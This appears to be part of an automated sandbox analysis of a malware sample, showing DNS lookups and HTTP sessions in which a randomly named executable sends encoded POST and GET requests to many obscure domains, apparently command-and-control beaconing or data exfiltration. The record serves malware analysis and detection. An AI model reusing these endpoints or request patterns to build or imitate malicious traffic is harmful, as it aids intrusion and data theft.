Aug 13, 2024 06:43:57.627701044 CEST	1.1.1.1	192.168.2.5	0x91d4	No error (0)	www.xn--matfrmn-jxa4m.se		194.9.94.86	A (IP address)	IN (0x0001)	false
Aug 13, 2024 06:44:11.574134111 CEST	1.1.1.1	192.168.2.5	0x371	No error (0)	www.anuts.top		23.251.54.212	A (IP address)	IN (0x0001)	false
Aug 13, 2024 06:44:45.602709055 CEST	1.1.1.1	192.168.2.5	0xe0a8	No error (0)	www.telwisey.info		199.192.19.19	A (IP address)	IN (0x0001)	false
Aug 13, 2024 06:44:58.987118006 CEST	1.1.1.1	192.168.2.5	0xd0f0	No error (0)	www.sandranoll.com		213.145.228.16	A (IP address)	IN (0x0001)	false
Aug 13, 2024 06:45:12.991554022 CEST	1.1.1.1	192.168.2.5	0xa799	No error (0)	www.gipsytroya.com	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 13, 2024 06:45:12.991554022 CEST	1.1.1.1	192.168.2.5	0xa799	No error (0)	parkingpage.namecheap.com		91.195.240.19	A (IP address)	IN (0x0001)	false
Aug 13, 2024 06:45:26.346651077 CEST	1.1.1.1	192.168.2.5	0xa84f	No error (0)	www.helpers-lion.online		194.58.112.174	A (IP address)	IN (0x0001)	false
Aug 13, 2024 06:45:39.815001965 CEST	1.1.1.1	192.168.2.5	0x3e5	No error (0)	www.dmtxwuatbz.cc		172.67.210.102	A (IP address)	IN (0x0001)	false
Aug 13, 2024 06:45:39.815001965 CEST	1.1.1.1	192.168.2.5	0x3e5	No error (0)	www.dmtxwuatbz.cc		104.21.45.56	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.hprlz.cz

www.catherineviskadi.com

www.bfiworkerscomp.com

www.xn--fhq1c541j0zr.com

www.xn--matfrmn-jxa4m.se

www.anuts.top

www.telwisey.info

www.sandranoll.com

www.gipsytroya.com

www.helpers-lion.online

www.dmtxwuatbz.cc

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49711	5.44.111.162	80	1520	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 13, 2024 06:42:35.832775116 CEST	507	OUT	GET /w6qg/?uXTT=8FDHY8dP&jN=0lpTRQcDUH+iEsGzFrKDlEkxf0hSGbqe7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1Ca0ipuJKNLUJAUyvRep5v3DJLNu0m2HizCt4wFiNb5RCLtMg== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.hprlz.cz Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Aug 13, 2024 06:42:36.497150898 CEST	747	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 13 Aug 2024 04:42:36 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 388 Connection: close Location: https://www.hprlz.cz/w6qg/?uXTT=8FDHY8dP&jN=0lpTRQcDUH+iEsGzFrKDlEkxf0hSGbqe7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1Ca0ipuJKNLUJAUyvRep5v3DJLNu0m2HizCt4wFiNb5RCLtMg== Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 70 72 6c 7a 2e 63 7a 2f 77 36 71 67 2f 3f 75 58 54 54 3d 38 46 44 48 59 38 64 50 26 61 6d 70 3b 6a 4e 3d 30 6c 70 54 52 51 63 44 55 48 2b 69 45 73 47 7a 46 72 4b 44 6c 45 6b 78 66 30 68 53 47 62 71 65 37 5a 2f 78 75 4e 6d 54 67 64 6c 69 39 72 70 4f 55 47 79 58 69 7a 6a 35 63 51 39 58 78 43 34 73 6f 38 34 46 4e 70 46 52 39 74 78 58 78 6d 30 74 71 31 43 61 30 69 70 75 4a 4b 4e 4c 55 4a 41 55 79 76 52 65 70 35 76 33 44 4a 4c 4e 75 30 6d 32 48 [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.hprlz.cz/w6qg/?uXTT=8FDHY8dP&jN=0lpTRQcDUH+iEsGzFrKDlEkxf0hSGbqe7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1Ca0ipuJKNLUJAUyvRep5v3DJLNu0m2HizCt4wFiNb5RCLtMg==">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49712	217.160.0.106	80	1520	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 13, 2024 06:42:51.660427094 CEST	794	OUT	POST /qe66/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.catherineviskadi.com Origin: http://www.catherineviskadi.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 203 Referer: http://www.catherineviskadi.com/qe66/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6a 4e 3d 51 6c 48 72 66 70 53 50 44 67 78 66 5a 61 63 2b 51 6c 4e 41 73 53 42 46 62 6e 77 79 33 61 2b 72 64 6c 56 6d 4d 4e 6b 2b 49 4c 37 5a 59 72 47 4d 46 70 61 4c 66 35 6f 76 69 35 4c 39 78 6f 56 57 4f 43 42 46 78 67 58 30 61 6d 6f 4f 34 53 4c 4e 42 54 7a 6f 6f 67 61 42 6a 62 71 48 52 2b 64 78 37 67 4a 62 61 31 71 68 6a 75 57 6d 54 6f 68 6f 6b 54 4f 4e 33 6a 7a 34 4d 74 44 52 37 4b 31 73 77 67 44 6b 79 37 66 4c 71 67 65 56 52 48 69 38 6a 47 37 78 31 79 48 35 32 6f 75 51 55 4c 6e 52 37 33 49 6b 48 66 4f 7a 51 52 51 57 48 76 72 44 52 74 54 78 59 79 54 31 65 2b 46 33 51 55 69 71 5a 6f 4c 61 2b 6e 38 3d Data Ascii: jN=QlHrfpSPDgxfZac+QlNAsSBFbnwy3a+rdlVmMNk+IL7ZYrGMFpaLf5ovi5L9xoVWOCBFxgX0amoO4SLNBTzoogaBjbqHR+dx7gJba1qhjuWmTohokTON3jz4MtDR7K1swgDky7fLqgeVRHi8jG7x1yH52ouQULnR73IkHfOzQRQWHvrDRtTxYyT1e+F3QUiqZoLa+n8=
Aug 13, 2024 06:42:52.310221910 CEST	580	IN	HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Tue, 13 Aug 2024 04:42:52 GMT Server: Apache Content-Encoding: gzip Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED] Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R\|V}cplxXU*!6pBNI+MteRFSYj[7\|QqY3k\|G;,^{NPPouvw2O7.e(O~Nt^,G\|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49713	217.160.0.106	80	1520	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 13, 2024 06:42:54.192411900 CEST	814	OUT	POST /qe66/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.catherineviskadi.com Origin: http://www.catherineviskadi.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 223 Referer: http://www.catherineviskadi.com/qe66/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6a 4e 3d 51 6c 48 72 66 70 53 50 44 67 78 66 44 2f 55 2b 54 47 6c 41 35 43 42 43 48 33 77 79 2b 36 2b 56 64 6c 5a 6d 4d 4d 67 75 4c 34 66 5a 59 4c 32 4d 45 6f 61 4c 63 35 6f 76 70 5a 4c 38 31 6f 56 6e 4f 43 4e 72 78 69 44 30 61 6d 73 4f 34 54 37 4e 42 45 6e 72 72 51 61 44 6f 37 71 46 4d 75 64 78 37 67 4a 62 61 31 75 50 6a 76 2b 6d 51 59 52 6f 6c 79 4f 43 72 54 7a 2f 45 4e 44 52 32 71 31 6f 77 67 44 4b 79 2b 47 75 71 6d 43 56 52 48 53 38 67 54 58 79 38 79 48 37 35 49 76 45 46 71 4b 42 69 46 30 6c 4b 50 44 5a 41 54 45 7a 4c 35 47 70 4c 50 62 5a 4c 53 2f 4e 4f 74 4e 41 42 6b 44 44 44 4c 62 71 67 77 71 72 34 36 6e 32 45 50 63 5a 6e 56 66 73 79 71 73 4b 72 72 72 78 Data Ascii: jN=QlHrfpSPDgxfD/U+TGlA5CBCH3wy+6+VdlZmMMguL4fZYL2MEoaLc5ovpZL81oVnOCNrxiD0amsO4T7NBEnrrQaDo7qFMudx7gJba1uPjv+mQYRolyOCrTz/ENDR2q1owgDKy+GuqmCVRHS8gTXy8yH75IvEFqKBiF0lKPDZATEzL5GpLPbZLS/NOtNABkDDDLbqgwqr46n2EPcZnVfsyqsKrrrx
Aug 13, 2024 06:42:54.860408068 CEST	580	IN	HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Tue, 13 Aug 2024 04:42:54 GMT Server: Apache Content-Encoding: gzip Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED] Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R\|V}cplxXU*!6pBNI+MteRFSYj[7\|QqY3k\|G;,^{NPPouvw2O7.e(O~Nt^,G\|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49715	217.160.0.106	80	1520	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 13, 2024 06:42:56.722495079 CEST	1831	OUT	POST /qe66/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.catherineviskadi.com Origin: http://www.catherineviskadi.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1239 Referer: http://www.catherineviskadi.com/qe66/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6a 4e 3d 51 6c 48 72 66 70 53 50 44 67 78 66 44 2f 55 2b 54 47 6c 41 35 43 42 43 48 33 77 79 2b 36 2b 56 64 6c 5a 6d 4d 4d 67 75 4c 34 58 5a 59 36 57 4d 45 4c 43 4c 64 35 6f 76 6b 35 4c 68 31 6f 56 41 4f 43 46 76 78 69 50 6b 61 67 77 4f 35 78 7a 4e 52 67 4c 72 38 41 61 44 6e 62 71 49 52 2b 63 7a 37 67 5a 66 61 31 2b 50 6a 76 2b 6d 51 61 4a 6f 6c 6a 4f 43 70 54 7a 34 4d 74 44 4e 37 4b 31 41 77 67 37 38 79 36 62 62 72 51 79 56 53 6e 43 38 77 78 50 79 2b 53 48 44 34 49 76 4d 46 71 48 62 69 42 55 54 4b 50 32 32 41 52 55 7a 50 74 76 41 59 65 6e 65 52 52 6d 31 4d 2f 63 69 57 69 58 68 42 4b 54 4f 6f 6a 47 71 31 4f 76 43 54 50 67 4e 69 30 57 38 74 73 63 4e 69 50 53 38 2f 70 35 34 55 44 59 78 4a 4a 50 6b 4e 75 4e 4a 2b 30 43 43 4b 53 2f 32 63 45 76 57 57 4f 51 2b 32 42 7a 31 48 44 43 50 52 45 76 71 2f 37 2f 78 65 73 67 6d 62 75 31 35 30 6f 5a 35 46 4e 63 41 52 70 4b 52 7a 72 44 52 63 79 52 4e 6c 34 73 59 41 70 6d 4e 69 4a 61 73 57 4e 36 73 36 30 69 4e 36 75 30 31 64 72 36 72 54 55 6d 44 41 58 35 73 78 50 70 [TRUNCATED] Data Ascii: jN=QlHrfpSPDgxfD/U+TGlA5CBCH3wy+6+VdlZmMMguL4XZY6WMELCLd5ovk5Lh1oVAOCFvxiPkagwO5xzNRgLr8AaDnbqIR+cz7gZfa1+Pjv+mQaJoljOCpTz4MtDN7K1Awg78y6bbrQyVSnC8wxPy+SHD4IvMFqHbiBUTKP22ARUzPtvAYeneRRm1M/ciWiXhBKTOojGq1OvCTPgNi0W8tscNiPS8/p54UDYxJJPkNuNJ+0CCKS/2cEvWWOQ+2Bz1HDCPREvq/7/xesgmbu150oZ5FNcARpKRzrDRcyRNl4sYApmNiJasWN6s60iN6u01dr6rTUmDAX5sxPp3UuTC6FcQXzF/5wsvGZostbh71MAweh6LQmJIrN32y/CO5D3fSwX6mKu7KoomL8pbXhgFkS/U8wicrh6g47fDJgZHMqaBAlzJ7XnQhcsyKtZlgLi9EsjDuzWYZi4dOGmfcEgRAcjMHDmHxGTLexBSfMh1EqNunBhL9Q4fOQq4CLePnSKtJLFPJ47jT1ifPGQ8YSycNrg/LLkuV40k72gJheWwicWuN9VNJX5hWHJaLaKVhHj4lfiAQH0r66g1+I6mcq/b29jOLz1z/h6i6MtVd78LEQp88oZlnGEzkaXbCHYpx20klx/P7tqyxVFsmHMckA+jddGob/pum4mgLLpuDssrAQWNCHT+Up3UwijhaKWYKE2Tg8PK7/XtPFb4u81dd3kiinAPNKo334ZXrMkDyiQiu0UcbPoYDhr0zZ1t/hq9uzjE0DApYpLxsY31+la2QLXUN3mVJtfpC5yEGlKZ3XFmFEhvfH96HlZ4k3fOaR71WS7Jv8/Z3Xu8X5Zor/U1pw3A4VoohKE1NKhn8R7F/OCTZ2bPziPKrNuaO2OcaS0ZdJyzTLL2A2TkUP3e7jYIiLQs0EFyNi+Ixa4qLObZZ7NErzC9gy7aFnNUA6RWxCpR/QOyxGUmhZnDdnPxMH8hOMewAGdGdYf+L4smRXeE6IImWOqw749pQ [TRUNCATED]
Aug 13, 2024 06:42:57.360588074 CEST	580	IN	HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Tue, 13 Aug 2024 04:42:57 GMT Server: Apache Content-Encoding: gzip Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED] Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R\|V}cplxXU*!6pBNI+MteRFSYj[7\|QqY3k\|G;,^{NPPouvw2O7.e(O~Nt^,G\|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49716	217.160.0.106	80	1520	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 13, 2024 06:42:59.256431103 CEST	519	OUT	GET /qe66/?jN=dnvLceXALBk3Hr4/PEp98EYmblYqw8i+NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv5wKSlbq5H9RfpzlUfmq/1+2mTftJij2S2gWTPvHx6aM7mw==&uXTT=8FDHY8dP HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.catherineviskadi.com Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Aug 13, 2024 06:42:59.895911932 CEST	770	IN	HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 626 Connection: close Date: Tue, 13 Aug 2024 04:42:59 GMT Server: Apache Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49717	208.91.197.27	80	1520	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 13, 2024 06:43:21.549137115 CEST	788	OUT	POST /xzzi/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.bfiworkerscomp.com Origin: http://www.bfiworkerscomp.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 203 Referer: http://www.bfiworkerscomp.com/xzzi/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6a 4e 3d 77 41 37 79 63 45 49 75 2b 6f 76 49 35 39 72 66 31 37 61 31 55 4f 5a 4d 67 47 38 38 71 50 57 30 74 56 59 38 77 6e 46 75 57 76 5a 6f 63 31 2b 36 77 2b 43 4c 4c 58 74 7a 67 2f 31 58 4c 56 69 70 4a 2f 34 48 56 58 2f 4d 67 67 48 48 68 4d 4a 75 6b 52 76 6d 51 4a 70 46 4c 67 5a 72 7a 6b 4f 4a 63 62 68 34 34 76 67 78 64 64 51 30 68 38 52 59 6c 33 68 50 66 30 53 41 58 4a 37 56 50 6b 4c 37 64 30 41 75 61 67 62 77 64 44 57 34 4b 34 53 46 6e 37 54 52 75 6b 74 6b 79 76 53 49 37 38 45 54 44 6f 53 78 47 67 54 2f 4b 46 57 7a 59 39 6d 73 48 76 47 54 76 35 2b 79 35 46 78 76 6e 4f 77 62 6b 64 74 39 66 59 6b 3d Data Ascii: jN=wA7ycEIu+ovI59rf17a1UOZMgG88qPW0tVY8wnFuWvZoc1+6w+CLLXtzg/1XLVipJ/4HVX/MggHHhMJukRvmQJpFLgZrzkOJcbh44vgxddQ0h8RYl3hPf0SAXJ7VPkL7d0AuagbwdDW4K4SFn7TRuktkyvSI78ETDoSxGgT/KFWzY9msHvGTv5+y5FxvnOwbkdt9fYk=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49718	208.91.197.27	80	1520	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 13, 2024 06:43:24.084594011 CEST	808	OUT	POST /xzzi/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.bfiworkerscomp.com Origin: http://www.bfiworkerscomp.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 223 Referer: http://www.bfiworkerscomp.com/xzzi/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6a 4e 3d 77 41 37 79 63 45 49 75 2b 6f 76 49 37 64 62 66 6d 4d 4f 31 46 65 59 2b 6c 47 38 38 6b 66 57 76 74 56 55 38 77 6d 42 2b 57 35 78 6f 63 55 4f 36 78 2f 43 4c 49 58 74 7a 31 50 31 53 50 56 69 33 4a 2f 38 50 56 53 48 4d 67 67 44 48 68 4a 31 75 6b 41 76 35 52 5a 70 44 44 41 5a 74 33 6b 4f 4a 63 62 68 34 34 76 46 55 64 5a 30 30 68 50 5a 59 33 69 56 4d 57 55 53 44 57 4a 37 56 59 55 4c 2f 64 30 41 51 61 68 33 4b 64 42 75 34 4b 35 69 46 67 75 7a 53 68 6b 74 6d 76 2f 54 47 71 74 74 39 47 2b 4f 42 50 42 71 36 61 46 65 71 51 72 4c 47 64 4e 4f 37 38 5a 53 4b 70 57 35 59 32 2b 52 79 2b 2b 39 4e 42 50 79 52 6f 5a 53 4e 50 36 43 43 5a 45 52 4f 77 75 54 72 61 73 34 76 Data Ascii: jN=wA7ycEIu+ovI7dbfmMO1FeY+lG88kfWvtVU8wmB+W5xocUO6x/CLIXtz1P1SPVi3J/8PVSHMggDHhJ1ukAv5RZpDDAZt3kOJcbh44vFUdZ00hPZY3iVMWUSDWJ7VYUL/d0AQah3KdBu4K5iFguzShktmv/TGqtt9G+OBPBq6aFeqQrLGdNO78ZSKpW5Y2+Ry++9NBPyRoZSNP6CCZEROwuTras4v

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
